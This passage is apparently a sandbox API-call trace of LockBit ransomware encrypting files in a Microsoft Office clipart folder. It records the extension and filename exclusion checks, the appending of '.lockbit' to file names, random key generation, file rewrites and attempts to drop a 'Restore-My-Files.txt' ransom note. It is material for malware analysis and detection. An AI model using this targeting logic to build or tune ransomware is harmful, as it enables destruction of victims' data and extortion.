pbBuffer=0x3db0494) returned 0x0 [0167.887] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.892] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.892] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.892] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.893] free (_Block=0x1fa2ed8) [0167.893] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.893] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.893] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.893] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x37f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE05665_.WMF", cAlternateFileName="")) returned 1 [0167.893] lstrcmpiW (lpString1=".", lpString2="PE05665_.WMF") returned -1 [0167.893] lstrcmpiW (lpString1="..", lpString2="PE05665_.WMF") returned -1 [0167.893] PathFindExtensionW (pszPath="PE05665_.WMF") returned=".WMF" [0167.893] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.893] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.893] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.893] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.894] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.894] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.895] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE05665_.WMF") returned 1 [0167.895] lstrcmpiW (lpString1="ntldr", lpString2="PE05665_.WMF") returned -1 [0167.895] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE05665_.WMF") returned -1 [0167.895] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE05665_.WMF") returned -1 [0167.895] lstrcmpiW (lpString1="autorun.inf", lpString2="PE05665_.WMF") returned -1 [0167.895] lstrcmpiW (lpString1="thumbs.db", lpString2="PE05665_.WMF") returned 1 [0167.895] lstrcmpiW (lpString1="iconcache.db", lpString2="PE05665_.WMF") returned -1 [0167.895] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.895] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF") returned=".WMF" [0167.895] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.896] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.896] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.896] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF.lockbit") returned 72 [0167.896] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05665_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.897] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.897] malloc (_Size=0x40068) returned 0x3f70048 [0167.897] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=14328) returned 1 [0167.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.898] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.903] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.903] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.903] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.904] free (_Block=0x1fa2ed8) [0167.904] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.904] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.904] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f24df00, ftCreationTime.dwHighDateTime=0x1bd4bf5, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f24df00, ftLastWriteTime.dwHighDateTime=0x1bd4bf5, nFileSizeHigh=0x0, nFileSizeLow=0x167c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE05710_.WMF", cAlternateFileName="")) returned 1 [0167.904] lstrcmpiW (lpString1=".", lpString2="PE05710_.WMF") returned -1 [0167.904] lstrcmpiW (lpString1="..", lpString2="PE05710_.WMF") returned -1 [0167.905] PathFindExtensionW (pszPath="PE05710_.WMF") returned=".WMF" [0167.905] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.905] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.906] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE05710_.WMF") returned 1 [0167.907] lstrcmpiW (lpString1="ntldr", lpString2="PE05710_.WMF") returned -1 [0167.907] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE05710_.WMF") returned -1 [0167.907] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE05710_.WMF") returned -1 [0167.907] lstrcmpiW (lpString1="autorun.inf", lpString2="PE05710_.WMF") returned -1 [0167.907] lstrcmpiW (lpString1="thumbs.db", lpString2="PE05710_.WMF") returned 1 [0167.907] lstrcmpiW (lpString1="iconcache.db", lpString2="PE05710_.WMF") returned -1 [0167.907] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.907] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF") returned=".WMF" [0167.907] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.907] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.907] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.908] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.908] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF.lockbit") returned 72 [0167.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05710_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.910] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.910] malloc (_Size=0x40068) returned 0x3e70008 [0167.910] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=5756) returned 1 [0167.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0167.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.911] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0167.911] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0167.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.915] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.915] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.916] free (_Block=0x1fa2ed8) [0167.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.916] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.916] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49073b00, ftCreationTime.dwHighDateTime=0x1bd4c05, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x49073b00, ftLastWriteTime.dwHighDateTime=0x1bd4c05, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE05869_.WMF", cAlternateFileName="")) returned 1 [0167.917] lstrcmpiW (lpString1=".", lpString2="PE05869_.WMF") returned -1 [0167.917] lstrcmpiW (lpString1="..", lpString2="PE05869_.WMF") returned -1 [0167.917] PathFindExtensionW (pszPath="PE05869_.WMF") returned=".WMF" [0167.917] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.918] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE05869_.WMF") returned 1 [0167.919] lstrcmpiW (lpString1="ntldr", lpString2="PE05869_.WMF") returned -1 [0167.919] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE05869_.WMF") returned -1 [0167.919] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE05869_.WMF") returned -1 [0167.919] lstrcmpiW (lpString1="autorun.inf", lpString2="PE05869_.WMF") returned -1 [0167.919] lstrcmpiW 